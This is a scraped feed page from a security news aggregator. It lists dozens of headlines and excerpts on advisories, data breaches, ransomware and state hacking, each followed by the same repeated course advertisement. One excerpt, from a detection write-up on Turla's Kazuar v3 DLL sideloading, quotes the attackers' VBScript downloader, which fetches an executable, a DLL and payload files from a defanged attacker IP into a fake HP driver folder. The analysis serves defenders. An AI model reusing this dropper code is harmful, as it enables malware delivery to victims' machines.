1564
The most relevant and recent events in the world of information security https://malware.news All Projects: malwarecorp.com This channel is run by AI and BOT
Secure Access Service Edge (SASE)
What is Secure Access Service Edge? Secure Access Service Edge (SASE) is a cloud-based approach that combines networking and security into one service so people can safely connect to company resources from anywhere. SASE represents a fundamental shift in how organizations approach network security and connectivity in today’s distributed work environment. Rather than treating networking ... Secure Access Service Edge (SASE)
Introduction to Malware Binary Triage (IMBT) Course
Looking to level up your skills? Get 10% off using coupon code: MWNEWS10 for any flavor.
Enroll Now and Save 10%: Coupon Code MWNEWS10
Note: Affiliate link – your enrollment helps support this platform at no extra cost to you.
Check Point Unveils a New Security Strategy for Enterprises in the AI Age
Introduction to Malware Binary Triage (IMBT) Course
Looking to level up your skills? Get 10% off using coupon code: MWNEWS10 for any flavor.
Enroll Now and Save 10%: Coupon Code MWNEWS10
Note: Affiliate link – your enrollment helps support this platform at no extra cost to you.
NDSS 2025 – Density Boosts Everything
Session 12B: Malware
Introduction to Malware Binary Triage (IMBT) Course
Looking to level up your skills? Get 10% off using coupon code: MWNEWS10 for any flavor.
Enroll Now and Save 10%: Coupon Code MWNEWS10
Note: Affiliate link – your enrollment helps support this platform at no extra cost to you.
Google Chrome security advisory (AV26-126)
Introduction to Malware Binary Triage (IMBT) Course
Looking to level up your skills? Get 10% off using coupon code: MWNEWS10 for any flavor.
Enroll Now and Save 10%: Coupon Code MWNEWS10
Note: Affiliate link – your enrollment helps support this platform at no extra cost to you.
<div>
<div>
<div><p><strong>Serial number: </strong>AV26-126<br /><strong>Date: </strong>February 13, 2026</p>
</div>
Detection Satelital DLL SideLoading via MFC — TURLA´S KAZUAR V3
Very good everyone.
Turla’s Kazuar is a .NET malware family attributed to Russian state-sponsored actors that, in recent campaigns, has taken DLL SideLoading a step further by leveraging certain MFC binaries compiled between Visual Studio .NET 2002 and Visual Studio 2010. These binaries attempt to load satellite DLLs in an insecure way due to an incorrect path specification, improper handling of data during loading, and a very curious “fallback” logic.
In this article we will model the early stages of the kill chain of this attack on a Windows endpoint, from the initial vector to the loader, where we will observe:
— Dropping files into user-writable paths (AppData/Temp/ProgramData) originating from scripting engines.
— Execution of a legitimate binary from an anomalous location.
— The loading of a DLL by the previous binary, both sharing a very similar naming convention.
— How these drop, load, and execution events show a clear correlation when modeling detection.
Let’s rock!
OVERVIEW — GENERAL FUNCTIONSExecution begins with a Visual Basic script without encoded strings; at first glance it may seem harmless. It is unknown whether the user executed the script as a result of social engineering or whether it was launched programmatically after a previous foothold.
'On Error Resume Next
const SXH_SERVER_CERT_IGNORE_ALL_SERVER_ERRORS = 13056
host = "https://185.126.255[.]132"
Set objFSO = CreateObject("Scripting.FileSystemObject")
Set objFolder = objFSO.CreateFolder(CreateObject("WScript.Shell").ExpandEnvironmentStrings("%LOCALAPPDATA%") + "\Programs\HP")
Set objFolder = objFSO.CreateFolder(CreateObject("WScript.Shell").ExpandEnvironmentStrings("%LOCALAPPDATA%") + "\Programs\HP\Printer")
Set objFolder = objFSO.CreateFolder(CreateObject("WScript.Shell").ExpandEnvironmentStrings("%LOCALAPPDATA%") + "\Programs\HP\Printer\Driver")
conc = host + "/hpbprndi.exe"
Set objHTTP = CreateObject("WinHttp.WinHttpRequest.5.1")
Set WSHShell = CreateObject("WScript.Shell")
objHttp.Option(4) = 13056
objHTTP.Open "GET", conc, False
objHttp.Send
outFile=WSHShell.ExpandEnvironmentStrings("%LOCALAPPDATA%") + "\Programs\HP\Printer\Driver\hpbprndi.exe"
Set stream = CreateObject("ADODB.Stream")
stream.Type = 1
stream.Open
stream.Write objHttp.ResponseBody
stream.SaveToFile outFile, 2
stream.Close
conc = host + "/hpbprndiLOC.dll"
objHttp.Option(4) = 13056
objHTTP.Open "GET", conc, False
objHttp.Send
outFile=WSHShell.ExpandEnvironmentStrings("%LOCALAPPDATA%") + "\Programs\HP\Printer\Driver\hpbprndiLOC.dll"
Set stream = CreateObject("ADODB.Stream")
stream.Type = 1
stream.Open
stream.Write objHttp.ResponseBody
stream.SaveToFile outFile, 2
stream.Close
conc = host + "/jayb.dadk"
objHttp.Option(4) = 13056
objHTTP.Open "GET", conc, False
objHttp.Send
outFile=WSHShell.ExpandEnvironmentStrings("%LOCALAPPDATA%") + "\Programs\HP\Printer\Driver\jayb.dadk"
Set stream = CreateObject("ADODB.Stream")
stream.Type = 1
stream.Open
stream.Write objHttp.ResponseBody
stream.SaveToFile outFile, 2
stream.Close
conc = host + "/kgjlj.sil"
objHttp.Option(4) = 13056
objHTTP.Open "GET", conc, False
objHttp.Send
outFile=WSHShell.ExpandEnvironmentStrings("%LOCALAPPDATA%") + "\Programs\HP\Printer\Driver\kgjlj.sil"
Set stream = CreateObject("ADODB.Stream")
stream.Type = 1
stream.Open
stream.Write objHttp.ResponseBody
stream.SaveToFile outFile, 2
stream.Close
conc = host + "/pkrfsu.ldy"
objHttp.Option(4) = 13056
objHTTP.Open "GET", conc, False
objHttp.Send
outFile=WSHShell.ExpandEnvironmentStrings("%LOCALAPPDATA%") + "\Programs\HP\Printer\Driver\pkrfsu.ldy"
Set stream = CreateObject("ADODB.Stream")
stream.Type = 1
stream.Open
stream.Write objHttp.ResponseBody
stream.SaveToFile outFile,...
https://malware.news/t/detection-satelital-dll-sideloading-via-mfc-turla-s-kazuar-v3/104106
https://malware.news/c/news.rss
Project: @MalwareNews
Private: @MalwarePrivateBot
Group: @MalwareForums
Powered by @MalwareForum
PostgreSQL security advisory (AV26-125)
Introduction to Malware Binary Triage (IMBT) Course
Looking to level up your skills? Get 10% off using coupon code: MWNEWS10 for any flavor.
Enroll Now and Save 10%: Coupon Code MWNEWS10
Note: Affiliate link – your enrollment helps support this platform at no extra cost to you.
<div>
<div>
<div><p><strong>Serial number: </strong>AV26-125<br /><strong>Date: </strong>February 13, 2026</p>
</div>
Korea’s Personal Information Protection Commissioner fines 3 LVMH luxury brands after Salesforce data breaches
The South Korean regulator has imposed fines on three LVMH luxury brands in the wake of data breaches previously reported on this site. A machine translation of the South Korean notice indicates that the Personal Information Protection Commission imposed fines of 36.033 billion won USD $24,925,824.15 and penalties of 10.8 million won $7,472.78. on three luxury...
Introduction to Malware Binary Triage (IMBT) Course
Looking to level up your skills? Get 10% off using coupon code: MWNEWS10 for any flavor.
Enroll Now and Save 10%: Coupon Code MWNEWS10
Note: Affiliate link – your enrollment helps support this platform at no extra cost to you.
Top Nation-State Cyber Threats Targeting the United States
Top Nation-State Cyber Threats Targeting the United States
Introduction to Malware Binary Triage (IMBT) Course
Looking to level up your skills? Get 10% off using coupon code: MWNEWS10 for any flavor.
Enroll Now and Save 10%: Coupon Code MWNEWS10
Note: Affiliate link – your enrollment helps support this platform at no extra cost to you.
Fake shops target Winter Olympics 2026 fans
If you’ve seen the two stoat siblings serving as official mascots of the Milano Cortina 2026 Winter Olympics, you already know Tina and Milo are irresistible.
Introduction to Malware Binary Triage (IMBT) Course
Looking to level up your skills? Get 10% off using coupon code: MWNEWS10 for any flavor.
Enroll Now and Save 10%: Coupon Code MWNEWS10
Note: Affiliate link – your enrollment helps support this platform at no extra cost to you.
AI-Powered Knowledge Graph Generator & APTs, (Thu, Feb 12th)
Unstructured text to interactive knowledge graph via LLM & SPO triplet extraction
Introduction to Malware Binary Triage (IMBT) Course
Looking to level up your skills? Get 10% off using coupon code: MWNEWS10 for any flavor.
Enroll Now and Save 10%: Coupon Code MWNEWS10
Note: Affiliate link – your enrollment helps support this platform at no extra cost to you.
AI Weaponization: State Hackers Using Google Gemini for Espionage and Malware Generation
What Happened Google’s Threat Intelligence Group (GTIG) has confirmed that multiple state-sponsored hacking groups are actively using its Gemini large language model (LLM) to enhance their cyber espionage and attack capabilities. The activity spans reconnaissance, social engineering, vulnerability analysis, and the dynamic generation of malicious code. North Korean (UNC2970/Lazarus Group), Chinese (Mustang Panda, APT31, APT41), [...]
Introduction to Malware Binary Triage (IMBT) Course
Looking to level up your skills? Get 10% off using coupon code: MWNEWS10 for any flavor.
Enroll Now and Save 10%: Coupon Code MWNEWS10
Note: Affiliate link – your enrollment helps support this platform at no extra cost to you.
The Most Important Thing I’ve Read This Year
Lawyers and judges need to stop snickering at the sad sacks who file briefs citing hallucinated authorities and treating those ...
Continue reading →
Introduction to Malware Binary Triage (IMBT) Course
Looking to level up your skills? Get 10% off using coupon code: MWNEWS10 for any flavor.
Enroll Now and Save 10%: Coupon Code MWNEWS10
Note: Affiliate link – your enrollment helps support this platform at no extra cost to you.
It’s 2026, but hospitals still haven’t prevented snooping in celebrities’ records
DataBreaches is not on TikTok and, being something of a dinosaur, never heard of “Josh and Jase” before. But no patient should have their privacy violated the ways Josh’s was. What happened to “break the glass?” What happened to all the software and auditing protections to prevent hospital employees from snooping on celebrity patients’ records?..
Introduction to Malware Binary Triage (IMBT) Course
Looking to level up your skills? Get 10% off using coupon code: MWNEWS10 for any flavor.
Enroll Now and Save 10%: Coupon Code MWNEWS10
Note: Affiliate link – your enrollment helps support this platform at no extra cost to you.
ApolloMD reveals that 626,540 patients were affected by May, 2025 cyberattack
There is an update to a breach previously reported on DataBreaches.net. ApolloMD describes itself as a private, independent group of physicians that partners with more than 100 hospitals nationwide to provide integrated, multispecialty physician, Ambulatory Payment Classifications (APCs), and practice management services. As such, they are business associates of HIPAA-covered entities. This week, the Georgia-based...
Introduction to Malware Binary Triage (IMBT) Course
Looking to level up your skills? Get 10% off using coupon code: MWNEWS10 for any flavor.
Enroll Now and Save 10%: Coupon Code MWNEWS10
Note: Affiliate link – your enrollment helps support this platform at no extra cost to you.
Threat Intelligence Snapshot: Week 7, 2026
QuoIntelligence’s Weekly Intelligence Snapshot for the week of 5 to 11 February 2026 is now available!
Introduction to Malware Binary Triage (IMBT) Course
Looking to level up your skills? Get 10% off using coupon code: MWNEWS10 for any flavor.
Enroll Now and Save 10%: Coupon Code MWNEWS10
Note: Affiliate link – your enrollment helps support this platform at no extra cost to you.
South Korea blames Coupang data breach on management failure, not sophisticated attack
Heekyong Yang and Hyunjoo Jin report: South Korean officials blamed a massive data leak last year at Coupang on management failure, rather than a sophisticated cyberattack, and urged the e-commerce giant to fix vulnerabilities in its security systems. Announcing the first findings of a government-led probe, the Science Ministry said on Tuesday a former Coupang...
Introduction to Malware Binary Triage (IMBT) Course
Looking to level up your skills? Get 10% off using coupon code: MWNEWS10 for any flavor.
Enroll Now and Save 10%: Coupon Code MWNEWS10
Note: Affiliate link – your enrollment helps support this platform at no extra cost to you.
CISA to furlough most of its workforce under impending DHS shutdown
<p>A likely partial government shutdown after Friday would impair the Cybersecurity and Infrastructure Security Agency’s operations, leading to diminished capabilities in critical areas including cyber response, security assessments, stakeholder engagements, training exercises and special event planning, a top official said this week.</p>
Introduction to Malware Binary Triage (IMBT) Course
Looking to level up your skills? Get 10% off using coupon code: MWNEWS10 for any flavor.
Enroll Now and Save 10%: Coupon Code MWNEWS10
Note: Affiliate link – your enrollment helps support this platform at no extra cost to you.
HPE security advisory (AV26-127)
Introduction to Malware Binary Triage (IMBT) Course
Looking to level up your skills? Get 10% off using coupon code: MWNEWS10 for any flavor.
Enroll Now and Save 10%: Coupon Code MWNEWS10
Note: Affiliate link – your enrollment helps support this platform at no extra cost to you.
<div>
<div>
<div><p><strong>Serial number: </strong>AV26-127<br /><strong>Date: </strong>February 13, 2026</p>
</div>
Sintesi riepilogativa delle campagne malevole nella settimana del 7 – 13 febbraio
In questa settimana, il CERT-AGID ha riscontrato ed analizzato, nello scenario italiano di suo riferimento, un totale di 108 campagne malevole, di cui 68 con obiettivi italiani e 40 generiche che hanno comunque interessato l’Italia, mettendo a disposizione dei suoi enti accreditati i relativi 882 indicatori di compromissione (IoC) individuati.
Introduction to Malware Binary Triage (IMBT) Course
Looking to level up your skills? Get 10% off using coupon code: MWNEWS10 for any flavor.
Enroll Now and Save 10%: Coupon Code MWNEWS10
Note: Affiliate link – your enrollment helps support this platform at no extra cost to you.
MITRE ATT&CK® Framework Beginners Guide
Introduction to Malware Binary Triage (IMBT) Course
Looking to level up your skills? Get 10% off using coupon code: MWNEWS10 for any flavor.
Enroll Now and Save 10%: Coupon Code MWNEWS10
Note: Affiliate link – your enrollment helps support this platform at no extra cost to you.
How to find and remove credential-stealing Chrome extensions
Researchers have found yet another family of malicious extensions in the Chrome Web Store. This time, 30 different Chrome extensions were found stealing credentials from more than 260,000 users.
Introduction to Malware Binary Triage (IMBT) Course
Looking to level up your skills? Get 10% off using coupon code: MWNEWS10 for any flavor.
Enroll Now and Save 10%: Coupon Code MWNEWS10
Note: Affiliate link – your enrollment helps support this platform at no extra cost to you.
chrome://extensions/.C:\Users\<your‑username>\AppData\Local\Google\Chrome\User Data\Default\Extensions.
IRS Improperly Shares Immigrants’ Data with ICE: Explained
Erin Schilling and Erin Slowey report: The IRS’ improper disclosure of thousands of immigrants’ personal information to the Department of Homeland Security fulfilled early warnings that the data-sharing deal between the agencies would put taxpayer data at risk. The IRS and DHS in April 2025 agreed to share data of immigrants to help with criminal...
Introduction to Malware Binary Triage (IMBT) Course
Looking to level up your skills? Get 10% off using coupon code: MWNEWS10 for any flavor.
Enroll Now and Save 10%: Coupon Code MWNEWS10
Note: Affiliate link – your enrollment helps support this platform at no extra cost to you.
AI-Driven Threats Targeting U.S. Organizations
AI-Driven Threats Targeting U.S. Organizations
Introduction to Malware Binary Triage (IMBT) Course
Looking to level up your skills? Get 10% off using coupon code: MWNEWS10 for any flavor.
Enroll Now and Save 10%: Coupon Code MWNEWS10
Note: Affiliate link – your enrollment helps support this platform at no extra cost to you.
UK’s Digital ID U-Turn: What It Means for Security
The UK government has quietly backed away from one of its most controversial policies. Making a national digital ID mandatory for anyone who wants to work in the country. Prime Minister Keir Starmer’s Brit Card plan would have required every working adult to hold a digital identity document on their phone by 2029. As part of a broader crackdown on illegal work and immigration.
Introduction to Malware Binary Triage (IMBT) Course
Looking to level up your skills? Get 10% off using coupon code: MWNEWS10 for any flavor.
Enroll Now and Save 10%: Coupon Code MWNEWS10
Note: Affiliate link – your enrollment helps support this platform at no extra cost to you.
ISC Stormcast For Friday, February 13th, 2026 https://isc.sans.edu/podcastdetail/9808, (Fri, Feb 13th)
Introduction to Malware Binary Triage (IMBT) Course
Looking to level up your skills? Get 10% off using coupon code: MWNEWS10 for any flavor.
Enroll Now and Save 10%: Coupon Code MWNEWS10
Note: Affiliate link – your enrollment helps support this platform at no extra cost to you.
NDSS 2025 – PBP: Post-Training Backdoor Purification For Malware Classifiers
Session 12B: Malware
Introduction to Malware Binary Triage (IMBT) Course
Looking to level up your skills? Get 10% off using coupon code: MWNEWS10 for any flavor.
Enroll Now and Save 10%: Coupon Code MWNEWS10
Note: Affiliate link – your enrollment helps support this platform at no extra cost to you.
From Operations to Policy: Contributing to the Global Fight Against Ransomware
Today, the government of Canada issued a statement announcing that Arctic Wolf will continue to co-chair the Counter Ransomware Initiative Public-Private Sector Advisory Panel in 2026, alongside Public Safety Canada and BlackBerry. The panel will also include member organizations such as Ensign InfoSecurity, the Institute for Security and Technology, Microsoft, Palo Alto Networks, and the Royal United Service Institute. Why Global Collaboration Is Essential for Modern Ransomware Defense ... From Operations to Policy: Contributing to the Global Fight Against Ransomware
Introduction to Malware Binary Triage (IMBT) Course
Looking to level up your skills? Get 10% off using coupon code: MWNEWS10 for any flavor.
Enroll Now and Save 10%: Coupon Code MWNEWS10
Note: Affiliate link – your enrollment helps support this platform at no extra cost to you.
ロンウイットと米国BasisTechが資本業務提携
The post ロンウイットと米国BasisTechが資本業務提携 appeared first on BasisTech.
Introduction to Malware Binary Triage (IMBT) Course
Looking to level up your skills? Get 10% off using coupon code: MWNEWS10 for any flavor.
Enroll Now and Save 10%: Coupon Code MWNEWS10
Note: Affiliate link – your enrollment helps support this platform at no extra cost to you.
Kettering Adventist Health now notifying patients affected by May 2025 ransomware attack
On May 20, 2025, CNN reported that a ransomware attack had triggered a “system-wide technology outage” at Kettering Adventist Health in Ohio. Disclosures by Kettering Health would later explain that the healthcare system had been attacked by InterLock, a ransomware gang who were threatening to destroy data and publish data if their demands were not...
Introduction to Malware Binary Triage (IMBT) Course
Looking to level up your skills? Get 10% off using coupon code: MWNEWS10 for any flavor.
Enroll Now and Save 10%: Coupon Code MWNEWS10
Note: Affiliate link – your enrollment helps support this platform at no extra cost to you.
Arctic Wolf Product Updates: February 2026
The most effective security operations aren’t built by buying more tools. They’re built by making the tools you already have work better together. We hear from our customers that their security teams need to extract maximum value from their technology while operating more efficiently than ever. This quarter, Arctic Wolf doubled down on three areas to support these efforts: smarter integrations, clearer visibility, ... Arctic Wolf Product Updates: February 2026
Introduction to Malware Binary Triage (IMBT) Course
Looking to level up your skills? Get 10% off using coupon code: MWNEWS10 for any flavor.
Enroll Now and Save 10%: Coupon Code MWNEWS10
Note: Affiliate link – your enrollment helps support this platform at no extra cost to you.